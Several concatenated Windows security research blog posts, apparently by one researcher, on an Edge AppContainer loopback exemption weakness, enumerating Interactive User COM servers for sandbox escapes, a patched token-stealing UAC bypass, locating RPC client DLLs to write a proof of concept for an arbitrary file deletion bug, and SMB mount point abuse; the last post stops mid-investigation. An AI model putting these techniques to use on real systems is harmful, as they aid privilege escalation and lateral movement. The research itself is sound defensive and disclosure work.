I like the concept of the App Container (AC) sandbox Microsoft introduced in Windows 8. It moved sandboxing on Windows from restricted tokens, which were hard to reason about and required massive kludges to get working, to a reasonably consistent capability based model where you are heavily limited in what you can do unless you’ve been granted an explicit capability when your application is started. On Windows 8 this was limited to a small set of known capabilities. On Windows 10 this has been expanded massively by effectively allowing an application to define its own capabilities and enforce them through the normal Windows access control mechanisms.

I’ve been looking at AC more, and its ability to do network isolation, where access to the network requires being granted capabilities such as “internetClient”, seems very useful. It’s a little known fact that even in the most heavily locked down, restricted token sandbox it’s possible to open network sockets by accessing the raw AFD driver. AC solves this issue quite well; it doesn’t block access to the AFD driver, instead the firewall checks for the capabilities and blocks connecting or accepting sockets.

One issue that does come up when building a generic sandboxing mechanism on this AC network isolation primitive is that, regardless of what capabilities you grant, it’s not possible for an AC application to access localhost. For example you might want your sandboxed application to access a web server on localhost for testing, or use a localhost proxy to MITM the traffic. Neither of these scenarios can be made to work in an AC sandbox with capabilities alone.

The likely rationale for blocking localhost is that allowing sandboxed content access can be a big security risk. Windows runs quite a few services accessible locally which could be abused, such as the SMB server. Rather than adding a capability to grant access to localhost, there's an explicit list of packages exempt from the localhost restriction stored by the firewall service. You can access or modify this list using the Firewall APIs, such as the NetworkIsolationSetAppContainerConfig function, or using the CheckNetIsolation tool installed with Windows. This behavior seems to be rationalized as accessing loopback being a developer feature, not something which real applications should rely on. Curious, I wondered whether I had ACs already in the exemption list. You can list all available exemptions by running “CheckNetIsolation LoopbackExempt -s” on the command line.


On my Windows 10 machine we can see two exemptions already installed, which is odd for a developer feature which no applications should be using. The first entry shows “AppContainer NOT FOUND” which indicates that the registered SID doesn’t correspond to a registered AC. The second entry shows a very unhelpful name of “001” which at least means it’s an application on the current system. What’s going on? We can use my NtObjectManager PS module and its Get-NtSid cmdlet on the second SID to see if that can resolve a better name.
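For reference, the lookup is just the following; the SID here is a made-up placeholder, substitute the real exemption SID from the CheckNetIsolation output:

PS C:\> Get-NtSid -Sddl "S-1-15-2-1-2-3-4-5-6-7-8-9-10-11-12" | Select Name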


Ahha, “001” is actually a child AC of the Edge package. We could have guessed this by looking at the length of the SID: a normal AC SID has 8 sub authorities, whereas a child has 12, with the extra 4 being added to the end of the base AC SID. Looking back at the unregistered SID we can see it’s also an Edge AC SID, just with a child which isn’t actually registered. The “001” AC seems to be the one used to host Internet content, at least based on the browser security whitepaper from X41Sec (see page 54).

This is not exactly surprising. It seems when Edge was first released it wasn’t possible to access localhost resources at all (as demonstrated by an IBM help article which instructs the user to use CheckNetIsolation to add an exemption). However, at some point in development MS added an about:flags option to enable accessing localhost, and it seems it’s now the default configuration, even though as you can see in the following screenshot it says enabling it can put your device at risk.


What’s interesting though is if you disable the flags option and restart Edge then the exemption entry is deleted, and re-enabling it restores the entry again. Why is that a surprise? Well based on previous knowledge of this exemption feature, such as this blog post by Eric Lawrence, you need admin privileges to change the exemption list. Perhaps MS have changed that behavior now? Let’s try and add an exemption using the CheckNetIsolation tool as a normal user, passing “-a -p=SID” parameters.
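Concretely the command is something like the following, with a made-up placeholder standing in for a real package SID:

C:\> CheckNetIsolation LoopbackExempt -a -p=S-1-15-2-1-2-3-4-5-6-7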


I guess they haven’t, as adding a new exemption using the CheckNetIsolation tool gives us access denied. Now I’m really interested. With Edge being a built-in application of course there’s plenty of ways that MS could have fudged the “security” checks to allow Edge to add itself to the list, but where is it?

The simplest location to add the fudge would be in the RPC service which implements NetworkIsolationSetAppContainerConfig. (How do I know there's an RPC service? I just disassembled the API.) I took a guess and assumed the implementation would be hosted in the “Windows Defender Firewall” service, which is implemented in the MPSSVC DLL. The following is a simplified version of the RPC server method for the API.

HRESULT RPC_NetworkIsolationSetAppContainerConfig(handle_t handle,
    DWORD dwNumPublicAppCs,
    PSID_AND_ATTRIBUTES appContainerSids) {
  // If the caller is an allowed package the security checks are skipped.
  if (!FwRpcAPIsIsPackageAccessGranted(handle)) {
    HRESULT hr;
    BOOL developer_mode = FALSE;
    IsDeveloperModeEnabled(&developer_mode);
    if (developer_mode) {
      hr = FwRpcAPIsSecModeAccessCheckForClient(1, handle);
      if (FAILED(hr)) {
        return hr;
      }
    } else {
      hr = FwRpcAPIsSecModeAccessCheckForClient(2, handle);
      if (FAILED(hr)) {
        return hr;
      }
    }
  }
  return FwMoneisAppContainerSetConfig(dwNumPublicAppCs,
                                       appContainerSids);
}

What’s immediately obvious is there's a method call, FwRpcAPIsIsPackageAccessGranted, which has “Package” in the name which might indicate it’s inspecting some AC package information. If this call succeeds then the following security checks are bypassed and the real function FwMoneisAppContainerSetConfig is called. It's also worth noting that the security checks differ depending on whether you're in developer mode or not. It turns out that if you have developer mode enabled then you can also bypass the admin check, which is confirmation the exemption list was designed primarily as a developer feature.

Anyway let's take a look at FwRpcAPIsIsPackageAccessGranted to see what it’s checking.

const WCHAR* allowedPackageFamilies[] = {
  L"Microsoft.MicrosoftEdge_8wekyb3d8bbwe",
  L"Microsoft.MicrosoftEdgeBeta_8wekyb3d8bbwe",
  L"Microsoft.zMicrosoftEdge_8wekyb3d8bbwe"
};

HRESULT FwRpcAPIsIsPackageAccessGranted(handle_t handle) {
  HANDLE token;
  FwRpcAPIsGetAccessTokenFromClientBinding(handle, &token);

  // Query the caller's package identity and extract its family name.
  WCHAR* package_id;
  RtlQueryPackageIdentity(token, &package_id);
  WCHAR family_name[0x100];
  PackageFamilyNameFromFullName(package_id, family_name);

  // Grant access if the family name matches the hard coded list.
  for (int i = 0; i < _countof(allowedPackageFamilies); ++i) {
    if (_wcsicmp(family_name, allowedPackageFamilies[i]) == 0) {
      return S_OK;
    }
  }
  return E_FAIL;
}

The FwRpcAPIsIsPackageAccessGranted function gets the caller’s token, queries for the package family name and then checks it against a hard coded list. If the caller is in the Edge package (or some beta versions) the function returns success, which results in the admin check being bypassed. The conclusion we can take is this is how Edge is adding itself to the exemption list, although we also want to check what access is required to the RPC server. For an ALPC server there are two security checks: connecting to the ALPC port and an optional security callback. We could reverse engineer it from the service binary but it is easier just to dump it from the ALPC server port; again we can use my NtObjectManager module.


As the RPC service doesn’t specify a name for the endpoint the RPC libraries generate a random name of the form “LRPC-XXXXX”. You would usually use EPMAPPER to find the real name but I just used a debugger on CheckNetIsolation to break on NtAlpcConnectPort and dumped the connection name. Then we just find the handle to that ALPC port in the service process and dump the security descriptor. The list contains Everyone and all the various network related capabilities, so any AC process with network access can talk to these APIs, including Edge LPAC. Therefore all Edge processes can access this capability and add arbitrary packages. The implementation inside Edge is in the function emodel!SetACLoopbackExemptions.
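A rough sketch of the handle-dumping step described above, assuming a single matching port, with the firewall service's PID (1234 here) and the port name match as placeholders:

PS C:\> $hs = Get-NtHandle -ProcessId 1234 | ? ObjectType -eq "ALPC Port"
PS C:\> $port = ($hs | ? Name -Match "LRPC-").GetObject()
PS C:\> $port.SecurityDescriptor.ToSddl()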

With this knowledge we can now put together some code which will exploit this “feature” to add arbitrary exemptions. You can find the PowerShell script on my Github gist.


Wrap Up

If I was willing to speculate (and I am) I’d say the reason that MS added localhost access this way is it didn’t require modifying kernel drivers, it could all be done with changes to user mode components. Of course the cynic in me thinks this could actually be just there to make Edge more equal than others, assuming MS ever allowed another web browser in the App Store. Even a wrapper around the Edge renderer would not be allowed to add the localhost exemption. It’d be nice to see MS add a capability to do this in the future, but considering current RS5 builds use this same approach I’m not hopeful.

Is this a security issue? Well that depends. On the one hand you could argue the default configuration, which allows Internet facing content to then access localhost, is dangerous in itself; they point that out explicitly in the about:flags entry. Then again all browsers have this behavior so I’m not sure it’s really an issue.

The implementation is pretty sloppy and I’m shocked (well, not that shocked) that it passed a security review. To list some of the issues with it:
  • The package family check isn’t very restrictive; combined with the weak permissions of the RPC service it allows any Edge process to add an arbitrary exemption.
  • The exemption isn’t linked to the calling process, so any SID can be added as an exemption.

While it seems the default is only to allow the Internet facing ACs access to localhost, because of these weaknesses if you compromised a Flash process (which is child AC “006”) then it could add itself an exemption and try and attack services listening on localhost. It would make more sense if only the main MicrosoftEdge process could add the exemptions, not any content process. But what would make the most sense would be to support this functionality through a capability so that everyone could take advantage of it rather than implementing it as a backdoor.



Finding Interactive User COM Objects using PowerShell

Easily one of the most interesting blogs on Windows behaviour is Raymond Chen's The Old New Thing. I noticed he'd recently posted about using "Interactive User" (IU) COM objects to go from an elevated application (in the UAC sense) to the current user for the desktop. What interested me is that registering arbitrary COM objects as IU can have security consequences, and of course this blog entry didn't mention anything about that.

The two potential security issues can be summarised as:

  1. An IU COM object can be a sandbox escape if it has non-default security (for example Project Zero Issue 1079) as you can start a COM server outside the sandbox and call methods on the object.
  2. An IU COM object can be a cross-session elevation of privilege if it has non-default security (for example Project Zero Issue 1021) as you can start a COM server in a different console session and call methods on the object.
I've blogged about this before when I discussed how I exploited a reference cycle bug in NtCreateLowBoxToken (see Project Zero Issue 483) and how to use my OleView.NET tool to find classes to check. Why do I need another blog post about it? I recently uploaded version 1.5 of my OleView.NET tool which comes with a fairly comprehensive PowerShell module, and this seemed like a good opportunity for a quick tutorial on using the module to find targets for analysis to see if you can find a new sandbox escape or cross-session exploit.

Note I'm not discussing how you go about reverse engineering the COM implementation for anything we find. I also won't be dropping any unknown bugs, but just giving you the information needed to find interesting COM servers.

Getting Started with PowerShell Module


First things first, you'll need to grab the release of v1.5 from THIS LINK (edit: you can now also get the module from the PowerShell Gallery). Unpack it to a directory on your system, then open PowerShell and navigate to the unpacked directory. Make sure you've allowed arbitrary scripts to run in PS, then run the following command to load the module.

PS C:\> Import-Module .\OleViewDotNet.psd1

As long as you see no errors the PS module will now be loaded. Next we need to capture a database of all COM registration information on the current machine. Normally when you open the GUI of OleView.NET the database will be loaded automatically, but not in the module. Instead you'll need to load it manually using the following command:

PS C:\> Get-ComDatabase -SetCurrent

The Get-ComDatabase cmdlet parses the system configuration for all COM information my tool knows about. This can take some time (maybe up to a minute, more if you have Process Monitor running), so it'll show a progress dialog. By specifying the -SetCurrent parameter we will store the database as the current global database for the current session. Many of the commands in the module take a -Database parameter where you can specify the database you want to extract information from. Ensuring you pass the correct value gets tedious after a while, so by setting the current database you never need to specify the database explicitly (unless you want to use a different one).

Now it's going to suck if every time you want to look at some COM information you need to run the lengthy Get-ComDatabase command. Trust me, I've stared at the progress bar too long. That's why I implemented a simple save and reload feature. Running the following command will write the current database out to the file com.db:

PS C:\> Set-ComDatabase .\com.db

You can then reload using the following command:

PS C:\> Get-ComDatabase .\com.db -SetCurrent

You'll find this is significantly faster. Worth noting, if you open a 64 bit PS command line you'll capture a database of the 64 bit view of COM, whereas in 32 bit PS you'll get a 32 bit view.

Finding Interactive User COM Servers


With the database loaded we can now query the database for COM registration information. You can get a handle to the underlying database object as the variable $comdb using the following command:

PS C:\> $comdb = Get-CurrentComDatabase

However, I wouldn't recommend using the COM database directly as it's not really designed for ease of use. Instead I provide various cmdlets to extract information from the database which I've summarised in the following table:


Command                 Description
-------                 -----------
Get-ComClass            Get list of registered COM classes
Get-ComInterface        Get list of registered COM interfaces
Get-ComAppId            Get list of registered COM AppIDs
Get-ComCategory         Get list of registered COM categories
Get-ComRuntimeClass     Get list of Windows Runtime classes
Get-ComRuntimeServer    Get list of Windows Runtime servers

Each command defaults to returning all registered objects from the database. They also take a range of parameters to filter the output to a collection or a single entry. I'd recommend passing the name of the command to Get-Help to see descriptions of the parameters and examples of use.

Why didn't I expose it as a relational database, say using SQL? The database is really an object collection and one thing PS is good at is interacting with objects. You can use the Where-Object command to filter objects, or Select-Object to extract certain properties and so on. Therefore rather than building a native query syntax it's a lot less work to just let you write PS scripts to filter, sort and group. To make life easier I have spent some time trying to link objects together, so for example each COM class object has an AppIdEntry property which links to the object for the AppID (if registered). In turn the AppID entry has a ClassEntries property which will then tell you all classes registered with that AppID, as the short example below shows.
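A minimal sketch of walking those links, picking an arbitrary class which happens to have a registered AppID:

PS C:\> $cls = Get-ComClass | ? AppIdEntry -ne $null | Select -First 1
PS C:\> $cls.AppIdEntry.ClassEntries | Select Name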

Okay, let's get a list of classes that are registered with RunAs set to "Interactive User". The class object returned from Get-ComClass has a RunAs property which is set to the name of the user account that the COM server runs as. You also need to only look for COM servers which run out of process; we can do this by filtering for only LocalServer32 classes.

Run the following command to do the filtering:

PS C:\> $runas = Get-ComClass -ServerType LocalServer32 | ? RunAs -eq "Interactive User"

You should now find the $runas variable contains a list of classes which will run as IU. If you don't believe me you can double check by just selecting out the RunAs property (the default table view won't show it) using the following:

PS C:\> $runas | Select Name, RunAs

Name                  RunAs
----                  -----
BrowserBroker Class   Interactive User
User Notification     Interactive User
...

On my machine I have around 200 classes installed that will run as IU. But that's not the end of the story, only a subset of these classes will actually be accessible from a sandbox such as Edge or cross-session. We need a way of filtering them down further. To filter we'll need to look at the associated security of the class registration, specifically the Launch and Access permissions. In order to launch the new object and get an instance of the class we'll need to be granted Launch Permission, then in order to access the object we get back we'll need to be granted Access Permissions. The class object exposes this as the LaunchPermission and AccessPermission properties respectively. However, these just contain a Security Descriptor Definition Language (SDDL) string representation of the security descriptor, which isn't easy to understand at the best of times. Fortunately I've made it easier, you can use the Select-ComAccess cmdlet to filter on classes which can be accessed from certain scenarios.

Let's first look at what objects we could access from the Edge content sandbox. First we need the access token of a sandboxed Edge process. The easiest way to get that is just to start Edge and open the token from one of the MicrosoftEdgeCP processes. Start Edge, then run the following to dump a list of the content processes.

PS C:\> Get-Process MicrosoftEdgeCP | Select Id, ProcessName

   Id ProcessName
   -- -----------
 8872 MicrosoftEdgeCP
 9156 MicrosoftEdgeCP
10040 MicrosoftEdgeCP
14856 MicrosoftEdgeCP

Just pick one of the PIDs; for this purpose it doesn't matter too much as all Edge CPs are more or less equivalent. Then pass the PID to the -ProcessId parameter for Select-ComAccess and pipe in the $runas variable we got from before.

PS C:\> $runas | Select-ComAccess -ProcessId 8872 | Select Name

Name
----
PerAppRuntimeBroker
...

On my system, that reduces the count of classes from 200 to 9 classes, which is a pretty significant reduction. If I rerun this command with a normal UWP sandboxed process (such as the calculator) that rises to 45 classes. Still fewer than 200 but a significantly larger attack surface. The reason for the reduction is Edge content processes use Low Privilege AppContainer (LPAC) which heavily cuts down inadvertent attack surface. 

What about cross-session? The distinction here is you'll be running as one unsandboxed user account and would like to attack another user account. This is quite important for the security of COM objects: the default access security descriptor uses the special SELF SID, which is replaced by the user account of the process hosting the COM server. Of course if the server is running as a different user in a different session the defaults won't grant access. You can see the default security descriptor using the following command:

Show-ComSecurityDescriptor -Default -ShowAccess

This command results in a GUI being displayed with the default access security descriptor. You see in this screenshot that the first entry grants access to the SELF SID.

Default COM access security showing NT AUTHORITY\SELF

To test for accessible COM classes we just need to tell the access checking code to replace the SELF SID with another SID we're not granted access to. You can do this by passing a SID to the -Principal parameter. The SID can be anything as long as it's not our user account or one of the groups we have in our access token. Try running the following command:

PS C:\> $runas | Select-ComAccess -Principal S-1-2-3-4 | Select Name

Name
----
BrowserBroker Class
...

On my system that leaves around 54 classes, still a reduction from 200 but plenty of attack surface to go at.

Inspecting COM Objects


I've only shown you how to find potential targets to look at for sandbox escape or cross-session attacks. But the class still needs some way of elevating privileges, such as a method on an interface which would execute an arbitrary executable or similar. Let's quickly look at some of the functions in the PS module which can help you find this functionality. We'll use the example of the HxHelpPane class I abused previously (and which is now fixed as a cross-session attack in Project Zero Issue 1224, probably).

The first thing is just to get a reference to the class object for the HxHelpPane server class. We can get the class using the following command:

PS C:\> $cls = Get-ComClass -Name "AP Client HxHelpPaneServer Class"

The $cls variable should now be a reference to the class object. First thing to do is find out what interfaces the class supports. In order to access a COM object out-of-process you need a registered COM proxy. We can use the list of registered proxy interfaces to find what the object responds to. Again I have a command to do just that, Get-ComClassInterface. Run the following command to get back a list of interface objects:

PS C:\> Get-ComClassInterface $cls | Select Name, Iid

Name              Iid
----              ---
IMarshal          00000003-0000-0000-c000-000000000046
IUnknown          00000000-0000-0000-c000-000000000046
IMultiQI          00000020-0000-0000-c000-000000000046
IClientSecurity   0000013d-0000-0000-c000-000000000046
IHxHelpPaneServer 8cec592c-07a1-11d9-b15e-000d56bfe6ee

Sometimes there are interesting interfaces on the factory object as well; you can get the list of interfaces for that by specifying the -Factory parameter to Get-ComClassInterface. Of the interfaces shown only IHxHelpPaneServer is unique to this class, the rest are standard COM interfaces. That's not to say they won't have interesting behavior but it wouldn't be the first place I'd look for interesting methods.

The implementation of these interfaces is likely to be in the COM server binary; where is that? We can just inspect the DefaultServer property on the class object.

PS C:\> $cls.DefaultServer
C:\Windows\helppane.exe

Can we now just break out IDA and go to town? Not so fast, it'd be useful to know exactly what we're dealing with before then. At this point I'd recommend at least using my tool's NDR parsing code to extract how the interface is structured. You can do this by passing an interface object from Get-ComClassInterface, or just a normal Get-ComInterface, into the Get-ComProxy command. Unfortunately if you do this you'll find a problem:

PS C:\> Get-ComInterface -Name IHxHelpPaneServer | Get-ComProxy
Exception: "Error while parsing NDR structures"
At OleViewDotNet.psm1:1587 char:17
+ [OleViewDotNet.COMProxyInterfaceInstance]::GetFromIID($In
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) []
    + FullyQualifiedErrorId : NdrParserException

This could be a bug in my code, but there's a more likely reason: the proxy could be an auto-created proxy from a type library. We can check that using the following:

PS C:\> Get-ComInterface -Name IHxHelpPaneServer

Name                 IID             HasProxy   HasTypeLib
----                 ---             --------   ----------
IHxHelpPaneServer    8cec592c-07a1... True       True

We can see in the output that the interface has a registered type library; for an interface this likely means its proxy is auto-generated. Where's the type library? Again we can use another database command, Get-ComTypeLib, and pass it the IID of the interface:

PS C:\> Get-ComTypeLib -Iid 8cec592c-07a1-11d9-b15e-000d56bfe6ee

TypelibId  : 8cec5860-07a1-11d9-b15e-000d56bfe6ee
Version    : 1.0
Name       : AP Client 1.0 Type Library
Win32Path  : C:\Windows\HelpPane.exe
Win64Path  : C:\Windows\HelpPane.exe
Locale     : 0
NativePath : C:\Windows\HelpPane.exe

Now you can use your favourite tool to decompile the type library to get back your interface information. You can also use the following command if you capture the type library information to the variable $tlb:

PS C:\> Get-ComTypeLibAssembly $tlb | Format-ComTypeLib
...
[Guid("8cec592c-07a1-11d9-b15e-000d56bfe6ee")]
interface IHxHelpPaneServer
{
   /* Methods */
   void DisplayTask(string bstrUrl);
   void DisplayContents(string bstrUrl);
   void DisplaySearchResults(string bstrSearchQuery);
   void Execute(string pcUrl);
}

You now know the likely names of the functions, which should aid you in looking them up in IDA or similar. That's the end of this quick tutorial; there's plenty more to discover in the PS module, you'll just have to poke around at it and see. Happy hunting.


Farewell to the Token Stealing UAC Bypass

With the release of Windows 10 RS5 the generic UAC bypass I documented in "Reading Your Way Around UAC" (parts 1, 2 and 3) has been fixed. This quick blog post will describe the relatively simple change MS made to the kernel to fix the UAC bypass and some musing on how it still might be possible to bypass.

As a quick recap, the UAC bypass I documented allowed any normal user on the same desktop to open a privileged UAC admin process and get a handle to the process' access token. The only requirement was there was an existing elevated process running on the desktop, but that's a very common behavior. That in itself didn't allow you to do much directly. However by duplicating the token, which made it writable, it was possible to selectively downgrade the token so that it could be impersonated.

Prior to Windows 10 all you needed to do was downgrade the token's integrity level to Medium. This left the token still containing the Administrators group, but it passed the kernel's checks for impersonation. This allows you to directly modify administrator only resources. For Windows 10 an elevation check was introduced which prevented a process in a non-elevated session from impersonating an elevated token. This was indicated by a flag in the limited token's logon session structure. If the flag was set, but you were impersonating an elevated token, it'd fail. This didn't stop you from impersonating the token as long as it was considered non-elevated, then abusing WMI to spawn a process in that session or using the Secondary Logon Service to get back administrator privileges.

Let's look now at how it was fixed. The changed code is in the SeTokenCanImpersonate method which determines whether a token is allowed to be impersonated or not.

TOKEN* process_token = ...;
TOKEN* imp_token = ...;

#define LIMITED_LOGON_SESSION 0x4

if (SeTokenIsElevated(imp_token)) {
  if (!SeTokenIsElevated(process_token) &&
      (process_token->LogonSession->Flags & LIMITED_LOGON_SESSION)) {
    return STATUS_PRIVILEGE_NOT_HELD;
  }
}
if ((process_token->LogonSession->Flags & LIMITED_LOGON_SESSION) &&
    !(imp_token->LogonSession->Flags & LIMITED_LOGON_SESSION)) {
  SepLogUnmatchedSessionFlagImpersonationAttempt();
  return STATUS_PRIVILEGE_NOT_HELD;
}

The first part of the code is the same as was introduced in Windows 10. If you try and impersonate an elevated token and your process is running in the limited logon session it'll be rejected. The new check introduced ensures that if you're in the limited logon session you're not trying to impersonate a token in a non-limited logon session. And there goes the UAC bypass: in any variation of the attack you need to impersonate the token to elevate your privileges.

The fix is pretty simple, although I can't help think there must be some edge case which this would trip up. The only case which comes to mind is tokens returned from the LogonUser APIs; however those are special cased earlier in the function, so I could imagine this would only be a problem when there might be a more significant security bug.

It's worth bearing in mind that due to the way Microsoft fixes bugs in UAC this will not be ported to versions prior to RS5. So if you're on a Windows Vista through Windows 10 RS4 machine you can still abuse this to bypass UAC, in most cases silently. And there's hardly a lack of other UAC bypasses, you just have to look at UACME. Though I'll admit none of the bypasses are as interesting to me as a fundamental design flaw in the whole technology. The only thing I can say is Microsoft seems committed to fixing these bugs eventually, even if they seem to introduce more UAC bypasses in each release.

Can this fix be bypassed? It's predicated on the user not having control over a process running outside of the limited logon session. A potential counter example would be processes spawned from an elevated process where the token is intentionally restricted, for example in sandboxed applications such as Adobe Reader or Chrome. However in order for that to be exploitable you'd need to convince the user to elevate those applications, which doesn't make for a general technique. There's of course potential impersonation bugs, such as my Constrained Impersonation attack which could be used to bypass Over-The-Shoulder elevation but also could be used to impersonate SYSTEM tokens. Bugs like that tend to be something Microsoft want to fix (the Constrained Impersonation one was fixed as CVE-2018-0821) so again not a general technique.

I did have a quick think about other ways of bypassing this, then I realized I don't actually care ;-)

Finding Windows RPC Client Implementations Through Brute Force

Recently, @SandboxEscaper wrote a detailed blog post (link) about reverse engineering local RPC servers for the purposes of discovering sandbox escapes and privilege escalation vulnerabilities. After reading it I thought I should put together a sort-of companion piece on implementing RPC clients for PoC writing; specifically, not implementing one unless you really need to.

If you go and read the blog post it goes through finding an RPC service to investigate using RpcView, then using the tool to decompile the RPC interface to an IDL file which can be added to a C++ project. This has a few problems when you're dealing with an unknown RPC interface:

  • Even if the decompiler was perfect (and RpcView or my own decompiler in my NtObjectManager PowerShell module are definitely not) the original IDL to NDR compilation process is lossy. Reversing this process with a decompiler doesn't always produce a 100% correct IDL file and thus the regenerated NDR might not be 100% compatible.
  • The NDR engine is terrible at giving useful diagnostic information for why the IDL is incorrect, usually just returning error code 1783 "The stub received bad data". This is made even more painful when dealing with complex structures or unions which must be exactly correct otherwise it all goes to hell.
  • It's hard to use the IDL from any language but C/C++, as that's really the only supported output format for RPC interfaces.
While all three of these problems are annoying when trying to produce a working PoC, the last one annoys me especially. I have a thing about writing my PoCs in C#; about the only exception to using C# is when I need to interact with an RPC server. There's plenty of ways around this, for example I could build the client into a native DLL and export methods to call from C#, but this feels unsatisfactory.

At least in some cases, Microsoft have already done most of the work for me. If there's a native RPC server on a default installation of Windows there must be some sort of client component. In some cases this client might be embedded completely inside a binary and not directly callable; COM is a good example. However in other cases the developers also provide a general purpose library to interact with the server. If you can find the client library, it'll bring a number of advantages:
  • If it's truly general purpose, the library will export methods which can be easily interacted with from C# using P/Invoke (or any other language which can invoke native exports).
  • The majority of these libraries will deal with setting up the RPC client connection, dealing with asynchronous calls and custom serialization requirements.
  • The NDR client code is going to be 100% compatible with the server, which should eliminate error code 1783 as well as dealing with changes to parameters, method layout and interface IDs which can happen between major versions of the OS. 
  • You only have to deal with calling a C style method (or sometimes a COM interface, but that's still a C calling convention) which gives a bit more flexibility when it comes to getting structure definitions correct.
  • As it's a library there's a chance that useful type information might be disclosed in the client code, or it will allow you to track down callers of these APIs in other binaries that you can RE to get a better idea of how to call the methods correctly.
There's sadly some disadvantages to this approach:
  • Not all clients will actually be in a general purpose library with easy entry points, or at least the entry points don't cleanly map to the underlying RPC methods. That's not to say it's useless as you could load the DLL then use a relative pointer to the RPC client structures and manually reconstruct the call but that removes many of the advantages.
  • The library might be general purpose but the developers added a significant amount of client side parameter verification or don't expose some parameters at all. Some bugs are only going to present themselves by calling the RPC method with parameters the developers didn't expect to receive, perhaps because they verify in the client.
To prevent this blog post getting even longer let's look at how I could identify the client library for the Data Sharing Service, which SandboxEscaper dropped a bug in that was recently fixed as CVE-2018-8584. The bug SandboxEscaper discovered was in the method PolicyChecker::CheckFilePermission implemented in dssvc.dll. By calling one of the RPC methods, such as RpcDSSMoveFromSharedFile, an arbitrary file can be deleted by the SYSTEM user. Looking at dssvc.dll it doesn't contain any client code, so we have to go hunting for the client. For this we'll use my NtObjectManager PowerShell module as it contains code to do just this. Any lines which start with PS> are to be executed in PowerShell.

Step 1: Install the NtObjectManager module from the PowerShell gallery.

PS> Install-Module NtObjectManager -Scope CurrentUser
PS> Import-Module NtObjectManager

You might need to also disable the script execution policy for this to work successfully.

Step 2: Parse RPC interfaces in all system DLLs using Get-RpcServer cmdlet.

PS> $rpc = ls c:\windows\system32\*.dll | Get-RpcServer -ParseClients

This call passes the list of all DLLs in system32 to the Get-RpcServer command and specifies that it should also parse all clients. This command does a heuristic search in a DLL's data sections for RPC servers and clients and parses the NDR structures. You can use this to generate RPC server definitions similar to RpcView (but in my own weird C# pseudo-code syntax), but for this scenario we only care about the clients. My code does have some advantages, for example the parsed NDR data is stored as a .NET object so you can do better analysis of the interface, but that's something for another day.

Step 3: Filter out the client based on IID and Client status.

PS> $rpc | ? {$_.Client -and $_.InterfaceId -eq 'bf4dc912-e52f-4904-8ebe-9317c1bdd497'} | Select FilePath

The server's IID is bf4dc912-e52f-4904-8ebe-9317c1bdd497, which you can easily get from the IDL server definition in the uuid attribute. We also need to filter to only client implementations using the Client property.

If you've followed these procedures you'll find that the client implementation is in the DLL dsclient.dll. Admittedly we might have been able to guess this based on the similarity of names, but it's not always so simple. 

Step 4: Disassemble/RE the library to find out how to call the methods.


Just because we've found a client implementation doesn't mean the DLL contains a general purpose library; we'll still need to open it in a disassembler and take a look. In this case we're lucky: if we look at the exports for the dsclient.dll library we find the names match up with the server. For example there's a DSMoveFromSharedFile which would presumably match up with RpcDSSMoveFromSharedFile.


Decompilation of DSMoveFromSharedFile


If you follow this code you'll find it's just a simple wrapper around a call to the method DSCMoveFromSharedFile which binds to the RPC endpoint and calls the server. There's no parameter verification taking place so we can just determine how to call this method from C# using the server IDL we generated earlier.

And that's it, I was able to implement a PoC for CVE-2018-8584 by defining the following C# P/Invoke method:

[DllImport("dsclient.dll", CharSet = CharSet.Unicode)]
public static extern int DSMoveFromSharedFile(string token, string source_file);

Of course your mileage may vary depending on your RPC server. But what I've described here is a quick and easy way to determine if there's a quick and easy way to avoid writing C++ code :-)

Abusing Mount Points over the SMB Protocol

This blog post is a quick writeup on an interesting feature of SMBv2 which might have uses for lateral movement and red-teamers. When I last spent significant time looking at symbolic link attacks on Windows I took a close look at the SMB server. Since version 2 the SMB protocol has support for symbolic links, specifically the NTFS Reparse Point format. If the SMB server encounters an NTFS symbolic link within a share it'll extract the REPARSE_DATA_BUFFER and return it to the client based on the SMBv2 protocol specification §2.2.2.2.1.

Screenshot of symbolic link error response from SMB specifications.

The client OS is responsible for parsing the REPARSE_DATA_BUFFER and following it locally. This means that only files the client can already access can be referenced by symbolic links. In fact even resolving symbolic links locally isn't enabled by default, although I did find a bypass which allowed a malicious server to bypass the client policy and allow resolving symbolic links locally. Microsoft declined to fix the bypass at the time; it's issue 138 if you're interested.

What I found interesting is while IO_REPARSE_TAG_SYMLINK is handled specially on the client, if the server encounters the IO_REPARSE_TAG_MOUNT_POINT reparse point it would follow it on the server. Therefore, if you could introduce a mount point within a share you could access any fixed disk on the server, even if it's not shared directly. That could have many uses for lateral movement, but the question becomes how could we add a mount point without already having local access to the disk?

First thing to try is to just create a mount point via a UNC path and see what happens. Using the MKLINK CMD built-in you get the following:

Using mklink on \\localhost\c$\abc returns the error "Local NTFS volumes are required to complete the operation."

The error would indicate that setting mount points on remote servers isn't supported. This would make some sense; setting a mount point on a remote drive could result in unexpected consequences. You'd assume the protocol either doesn't support setting reparse points at all, or at least restricts them to only allowing symbolic links. We can get a rough idea what the protocol expects by looking up the details in the protocol specification. Setting a reparse point requires sending the FSCTL_SET_REPARSE_POINT IO control code to a file, therefore we can look up the section on the SMB2 IOCTL command to see if there's any information about the control code.

After a bit of digging you'll find that FSCTL_SET_REPARSE_POINT is indeed supported and there's a note in §3.3.5.15.13 which I've reproduced below.

"When the server receives a request that contains an SMB2 header with a Command value equal to SMB2 IOCTL and a CtlCode of FSCTL_SET_REPARSE_POINT, message handling proceeds as follows:
If the ReparseTag field in FSCTL_SET_REPARSE_POINT, as specified in [MS-FSCC] section 2.3.65, is not IO_REPARSE_TAG_SYMLINK, the server SHOULD verify that the caller has the required permissions to execute this FSCTL.<330> If the caller does not have the required permissions, the server MUST fail the call with an error code of STATUS_ACCESS_DENIED."
The text in the specification seems to imply the server only needs to check explicitly for IO_REPARSE_TAG_SYMLINK, and if the tag is something different it should do some sort of check to see if it's allowed, but it doesn't say anything about setting a different tag to be explicitly banned. Perhaps it's just the MKLINK built-in which doesn't handle this scenario? Let's try the CreateMountPoint tool from my symboliclink-testing-tools project and see if that helps.

Using CreateMountPoint on \\localhost\c$\abc gives access denied.

CreateMountPoint doesn't show an error about only supporting local NTFS volumes, but it does return an access denied error. This ties in with the description in §3.3.5.15.13: if the implied check fails the code should return access denied. Of course the protocol specification doesn't actually say what check should be performed; I guess it's time to break out the disassembler and look at the implementation in the SMBv2 driver, srv2.sys.

